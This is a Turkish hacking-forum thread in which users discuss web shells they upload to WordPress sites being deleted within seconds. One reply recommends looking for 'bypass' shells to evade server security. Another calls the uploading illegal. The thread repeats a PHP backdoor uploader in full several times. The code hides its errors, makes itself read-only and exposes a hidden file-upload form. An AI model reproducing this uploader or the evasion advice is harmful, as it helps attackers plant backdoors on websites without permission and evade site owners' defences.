Çözüldü Shellerim siliniyor

Çözüm
Merhaba hocam,
Günümüz sunucuların çoğunda Firewalllar yüklediğin shell'in virüs dosyası olmasından kaynaklı olarak algıladığı anda silecektir. Bu yüzden alternatif Bypass Shelleri araştırmanı öneririm.

helpmii

Yeni üye
2 Ağu 2022
45
3
Merhaba hocam,
Günümüz sunucuların çoğunda Firewalllar yüklediğin shell'in virüs dosyası olmasından kaynaklı olarak algıladığı anda silecektir. Bu yüzden alternatif Bypass Shelleri araştırmanı öneririm.
teşekkürler deneyeceğim

Merhaba hocam,
Günümüz sunucuların çoğunda Firewalllar yüklediğin shell'in virüs dosyası olmasından kaynaklı olarak algıladığı anda silecektir. Bu yüzden alternatif Bypass Shelleri araştırmanı öneririm.
oldu çok teşekkür ederim

dostum bide bu kod ne işe yarıyor biliyormusun
<?php error_reporting(0);chmod(basename($_SERVER["PHP_SELF"]), 0444);echo("#0x2525");if(isset($_GET["u"])){echo'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo'<input type="file" name="file" size="30"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if($_POST['_upl']=="Upload"){if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'S';}else{echo'F';}};};
 
teşekkürler deneyeceğim


oldu çok teşekkür ederim

dostum bide bu kod ne işe yarıyor biliyormusun
<?php error_reporting(0);chmod(basename($_SERVER["PHP_SELF"]), 0444);echo("#0x2525");if(isset($_GET["u"])){echo'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo'<input type="file" name="file" size="30"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if($_POST['_upl']=="Upload"){if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'S';}else{echo'F';}};};

Php ile yazılmış bir dosya upload kodu hocam.
 

fsKS

Üye
11 Şub 2023
137
3
74
Bir wordpress siteye shell atmaya çalıştığımda 3sn sonra kendi kendine siliniyor shell
Bu durumda, muhtemelen WordPress site sahibi tarafından alınan bir güvenlik önlemi var. Çok sayıda web sitesi, kötü amaçlı yazılım saldırılarını önlemek için güvenlik önlemleri kullanmaktadır ve bu önlemler, saldırganların sitelere erişimini engelleyebilir veya saldırganların erişim sağladığı dosyaları otomatik olarak siler. Bu nedenle, bir WordPress siteye shell atmak istiyorsanız, öncelikle site sahibinin alınan güvenlik önlemlerini aşmanız gerekebilir. Ancak, bu yasadışı bir eylemdir ve hem etik hem de yasal nedenlerle tavsiye edilmez. WordPress veya herhangi bir web sitesindeki açıkları tespit etmek ve raporlamak için site sahibi veya güvenlik uzmanlarına bildirimde bulunmanız daha doğru bir yaklaşım olacaktır.

teşekkürler deneyeceğim


oldu çok teşekkür ederim

dostum bide bu kod ne işe yarıyor biliyormusun
<?php error_reporting(0);chmod(basename($_SERVER["PHP_SELF"]), 0444);echo("#0x2525");if(isset($_GET["u"])){echo'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo'<input type="file" name="file" size="30"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if($_POST['_upl']=="Upload"){if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'S';}else{echo'F';}};};
Bu PHP kodu, bir dosya yükleme formu oluşturur ve sunucuya dosya yüklenmesine izin verir. Ancak, kodda bir hata ayıklama komutu da bulunur ("error_reporting(0);"), bu da kodda oluşan hataların görüntülenmesini engeller ve kötü niyetli amaçlarla kullanılabilir. Ayrıca, kodda dosya yükleme işlemi sırasında herhangi bir güvenlik denetimi yapılmaz, bu nedenle kullanıcılar tarafından yüklenen dosyalar zararlı olabilir. Bu kod, kötü niyetli kullanım amaçlarına sahip olan bir kişi tarafından kullanılabilir ve yasa dışı faaliyetlere yol açabilir. Bu nedenle, bu tür kodların kullanımı kesinlikle tavsiye edilmez ve etik değildir.
 

helpmii

Yeni üye
2 Ağu 2022
45
3
Bu PHP kodu, bir dosya yükleme formu oluşturur ve sunucuya dosya yüklenmesine izin verir. Ancak, kodda bir hata ayıklama komutu da bulunur ("error_reporting(0);"), bu da kodda oluşan hataların görüntülenmesini engeller ve kötü niyetli amaçlarla kullanılabilir. Ayrıca, kodda dosya yükleme işlemi sırasında herhangi bir güvenlik denetimi yapılmaz, bu nedenle kullanıcılar tarafından yüklenen dosyalar zararlı olabilir. Bu kod, kötü niyetli kullanım amaçlarına sahip olan bir kişi tarafından kullanılabilir ve yasa dışı faaliyetlere yol açabilir. Bu nedenle, bu tür kodların kullanımı kesinlikle tavsiye edilmez ve etik değildir.
teşekkür ederim
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.